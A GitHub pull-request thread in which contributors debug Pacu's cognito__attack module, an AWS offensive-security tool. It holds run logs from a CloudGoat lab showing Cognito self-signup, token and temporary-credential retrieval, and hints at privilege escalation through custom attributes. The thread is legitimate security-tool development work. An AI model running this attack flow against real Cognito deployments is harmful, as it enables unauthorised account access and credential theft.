Issue 412 username overwrite

[EduardSchwarzkopf]

This should cover the issue #412

[davidkutz-marks]

Thanks again Eduard! Code looks good at a glance (only noticed that "response" is misspelled" resposne" on 409, 417 and 442) but there still seems to be some variation on the original username overwriting. Here's the error I get during testing, along with stacktrace pointing back to 442 (aws.authenticate_user()). Note that the error occurs for me whether I set the email value to the same as the username value or leave it blank. Tomorrow I'll make sure my identity pool and other details are same as before to ensure the error isn't on my end. Just wanted to reach out after finally getting to this PR!

Pacu (052024:No Keys Set) > import_keys default
Imported keys as "imported-default"
Pacu (052024:imported-default) > run cognito__attack --username randomuser --email [redacted] --identity_pools us-east-1:[redacted] --user_pool_clients [redacted]@us-east-1_[redacted]
Running module cognito__attack...
Automatically targeting regions:
ap-northeast-1
eu-central-1
eu-north-1
eu-south-1
me-south-1
sa-east-1
us-east-2
us-gov-east-1
us-gov-west-1
us-west-1
ap-east-1
ap-northeast-2
ap-northeast-3
ap-south-1
ap-southeast-1
ap-southeast-3
cn-north-1
eu-west-1
eu-west-3
il-central-1
af-south-1
ap-south-2
ap-southeast-2
ca-central-1
ca-west-1
cn-northwest-1
eu-central-2
eu-west-2
me-central-1
us-west-2
ap-southeast-4
eu-south-2
us-east-1
Continue? (y/n) y
[cognito__attack] Attempting unauthenticated retrieval of identity Id credentials
[cognito__attack] NotAuthorizedException
[cognito__attack] Skipping identity pool enumeration...
[cognito__attack] Attempting to sign up user in user pool client [redacted] in region us-east-1 . . .
An error occurred (InvalidParameterException) when calling the SignUp operation: Username should be an email.
Invalid parameter: An error occurred (InvalidParameterException) when calling the SignUp operation: Username should be an email.
Please enter the name of the invalid parameter: Username
Please enter the value of the invalid parameter: [redacted][email protected]
An error occurred (InvalidParameterException) when calling the SignUp operation: User email should be empty or same as username, since username attribute is email.
Invalid parameter: An error occurred (InvalidParameterException) when calling the SignUp operation: User email should be empty or same as username, since username attribute is email.
Please enter the name of the invalid parameter: email
Please enter the value of the invalid parameter:
An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: given_name: The attribute is required
family_name: The attribute is required

Enter value for given_name: tester
An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: family_name: The attribute is required

Enter value for family_name: mester
Successfully signed up user [redacted][email protected].
Enter verification code for user [redacted][email protected] in user pool client [redacted]: 858651
Successfully verified user [redacted][email protected]

[2024-05-07 18:17:57] Pacu encountered an error while running the previous command. Check [redacted]/052024/error_log.txt for technical details. [LOG LEVEL: MINIMAL]

<class 'botocore.errorfactory.NotAuthorizedException'>: An error occurred (NotAuthorizedException) when calling the RespondToAuthChallenge operation: Incorrect username or password.

File "[redacted]/052024/pacu/pacu/modules/cognito__attack/main.py", line 442, in main
tokens = aws.authenticate_user()
^^^^^^^^^^^^^^^^^^^^^^^
File "[redacted]/site-packages/pycognito/aws_srp.py", line 278, in authenticate_user
tokens = boto_client.respond_to_auth_challenge(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "[redacted]/site-packages/botocore/client.py", line 535, in _api_call
return self._make_api_call(operation_name, kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "[redacted]/site-packages/botocore/client.py", line 980, in _make_api_call
raise error_class(parsed_response, operation_name)
<class 'botocore.errorfactory.NotAuthorizedException'>: An error occurred (NotAuthorizedException) when calling the RespondToAuthChallenge operation: Incorrect username or password.

[EduardSchwarzkopf]

I encountered a little issue, where the user was already registered, but not confirmed yet. I've added the exception handling, so you can get a new token if you want to retry with the same user. As for your provided exception, I could not recreate it.
When I run the command similar to yours with the cloudgoat scenario vulnerable_cognito everything works fine on my end:

> import_keys default
  Imported keys as "imported-default"
Pacu (test:imported-default) > run cognito__attack --username random --email [email protected]  --identity_pools us-east-1:[redacted] --user_pool_clients [redacted]@us-east-1_[redacted]
  Running module cognito__attack...
Automatically targeting regions:
  ap-northeast-1
  eu-central-1
  eu-north-1
  eu-south-1
  me-south-1
  sa-east-1
  us-east-2
  us-gov-east-1
  us-gov-west-1
  us-west-1
  ap-east-1
  ap-northeast-2
  ap-northeast-3
  ap-south-1
  ap-southeast-1
  ap-southeast-3
  cn-north-1
  eu-west-1
  eu-west-3
  il-central-1
  af-south-1
  ap-south-2
  ap-southeast-2
  ca-central-1
  ca-west-1
  cn-northwest-1
  eu-central-2
  eu-west-2
  me-central-1
  us-west-2
  ap-southeast-4
  eu-south-2
  us-east-1
Continue? (y/n) y
[cognito__attack] Attempting unauthenticated retrieval of identity Id credentials
[cognito__attack]   NotAuthorizedException
[cognito__attack]   Skipping identity pool enumeration...
[cognito__attack] Attempting to sign up user in user pool client [redacted] in region us-east-1 . . . 
An error occurred (InvalidParameterException) when calling the SignUp operation: Username should be an email.
Invalid parameter: An error occurred (InvalidParameterException) when calling the SignUp operation: Username should be an email.
Please enter the name of the invalid parameter: username
Please enter the value of the invalid parameter: [email protected]
An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: name.givenName: The attribute name.givenName is required, name.familyName: The attribute name.familyName is required
Invalid parameter: An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: name.givenName: The attribute name.givenName is required, name.familyName: The attribute name.familyName is required
Please enter the name of the invalid parameter: given_name
Please enter the value of the invalid parameter: test
An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: name.familyName: The attribute name.familyName is required
Invalid parameter: An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: name.familyName: The attribute name.familyName is required
Please enter the name of the invalid parameter: family_name
Please enter the value of the invalid parameter: test
Successfully signed up user [email protected].
Enter verification code for user [email protected] in user pool client [redacted]: 286306
Successfully verified user [email protected]
[cognito__attack] You're signed in as [email protected]!
[cognito__attack] Your access token is: [redacted]
[cognito__attack] Your ID token is: [redacted]
[cognito__attack] Your refresh token is: [redacted]
[cognito__attack] Your token type is: Bearer
Attempting authenticated retrieval of identity Id
Identity ID: {'IdentityId': 'us-east-1:[redacted]', 'ResponseMetadata': {'RequestId': 'c3e787c1-e195-47dc-98a3-d54caabe3375', 'HTTPStatusCode': 200, 'HTTPHeaders': {'date': 'Thu, 09 May 2024 12:20:16 GMT', 'content-type': 'application/x-amz-json-1.1', 'content-length': '63', 'connection': 'keep-alive', 'x-amzn-requestid': 'c3e787c1-e195-47dc-98a3-d54caabe3375', 'strict-transport-security': 'max-age=31536000; includeSubDomains'}, 'RetryAttempts': 0}}
Attempting authenticated retrieval of temporary credentials
Access Key ID found.
[redacted]
Secret Key found.
[redacted]
Session Token found.
[redacted]
Expiration found.
2024-05-09 15:20:16+02:00
[cognito__attack] Temporary credentials retrieved!
[cognito__attack] {
  "Region": "us-east-1",
  "IdentityPoolId": "us-east-1:[redacted]",
  "AccessKeyId": "[redacted]",
  "SecretKey": "[redacted]",
  "SessionToken": "[redacted]",
  "Expiration": "2024-05-09 15:20:16+02:00"
}
Custom attribute(s) found! Changing these may lead to privilege escalation.
Changing basic attributes such as email may lead to account takeover if they are used to identify users. 
Printing all current attributes: 
[{'Name': 'email', 'Value': '[email protected]'}, {'Name': 'email_verified', 'Value': 'true'}, {'Name': 'family_name', 'Value': 'test'}, {'Name': 'given_name', 'Value': 'test'}, {'Name': 'custom:access', 'Value': 'reader'}, {'Name': 'sub', 'Value': '14e87468-70d1-70ac-e432-767ab21506ac'}]

[davidkutz-marks]

Running into what is probably a list/dictionary mixup now, naybe caused by the BaseClient addition you just made:

Enter verification code for user [email protected] in user pool client 3lotnnp48p5t6ikj8r97lnb0dt: 010749
Successfully verified user [email protected]

[2024-05-24 16:49:55] Pacu encountered an error while running the previous command. Check /root/.local/share/pacu/05242024/error_log.txt for technical details. [LOG LEVEL: MINIMAL]

<class 'TypeError'>: list indices must be integers or slices, not str

Traceback (most recent call last):
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 1826, in run_gui
self.idle()
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 1683, in idle
self.idle()
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 1683, in idle
self.idle()
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 1681, in idle
self.parse_command(command)
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 600, in parse_command
self.parse_exec_module_command(command)
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 786, in parse_exec_module_command
self.exec_module(command)
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/main.py", line 1003, in exec_module
summary_data = module.main(command[2:], self)
File "/home/david/rhino/newestpacu/pacu-issue-412-username-overwrite/pacu/modules/cognito__attack/main.py", line 636, in main
if tokens["ChallengeName"] == "MFA_SETUP":
<class 'TypeError'>: list indices must be integers or slices, not str

[EduardSchwarzkopf]

Will take a look

[EduardSchwarzkopf]

alight, the problem was that the tokens were missing after a failed authentication attempt. I've added my function for this now and added an abort statement if the authentication fails. This can be because of use aborted the process or the function encountered any other issue.
I've also added the ability to resend the verification token if needed

[DaveYesland]

I was able to run through this with no errors will merge this. @davidkutz-marks if you want to double check that would be great. @EduardSchwarzkopf thanks for the fixes and work on this!